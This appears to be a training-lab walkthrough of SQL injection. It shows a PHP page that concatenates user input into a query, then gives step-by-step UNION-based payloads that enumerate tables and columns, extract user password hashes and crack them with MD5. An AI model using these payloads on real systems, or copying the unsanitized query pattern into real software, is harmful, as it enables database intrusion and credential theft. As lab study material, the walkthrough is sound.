SQL Injection
interface
Source code
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {
$id}<br />First name: {
$first}<br />Surname: {
$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
Code analysis
After the user clicks submit, the user obtains the id entered by the user, and then prints out the corresponding first_name and last_name. It can be seen that the id entered by the user is not legally judged, which may easily cause SQL injection.
Infiltration step
Step 1: Enter 1 to view the results.
Step 2: Enter 1‘ or ‘1’=’1
and view the results. You can see that you have all the id data in the database, so you know that there is indeed a SQL vulnerability.
Step 3: Guess the field of the current library by order by. Input 1' or 1=1 order by 1 #
, the input result is normal
Step 4: Guess the field of the current database by order by, input 1' or 1=1 order by 2 #
, the input result is normal
Step 5: Input 1' or 1=1 order by 3 #
, the input result is abnormal, the current database has only two fields, namely First name and Surname
Step 6: Enter 1' union select 1,2
, you can see that there are 1, 2 in the second column of data, you can modify the value of 1, 2 to get the data I want.
Step 7: Test the previous conjecture, enter to 1' union select database(),version()#
get the current database name and database version , Check the results to confirm that you can use union select to obtain the desired data.
Step 8: Enter the 1' union select 1,hex(group_concat(table_name)) from information_schema.tables where table_schema=database()#
name of the table in the database.
Step 9: Decode the obtained hex code to get the real table name: guestbook, users. Just two tables.
Step 10: Enter and 1' union select 1,hex(group_concat(column_name)) from information_schema.columns where table_name='users' #
view the field names in the users table
. Eleven steps: input 1' union select first_name,password from users#
, query the user name and password.
Step 12: use the md5 decryption tool to decrypt the obtained password, and you can see that the result is correct
Problems encountered
1. Why is the hex function used in the eighth and tenth steps?
Solution: If the hex function is not used, an error will be reported. This is due to the problem caused by the encoding.
Error picture:
2. How to determine that the database uses the md5 encryption
method. : Guess, good luck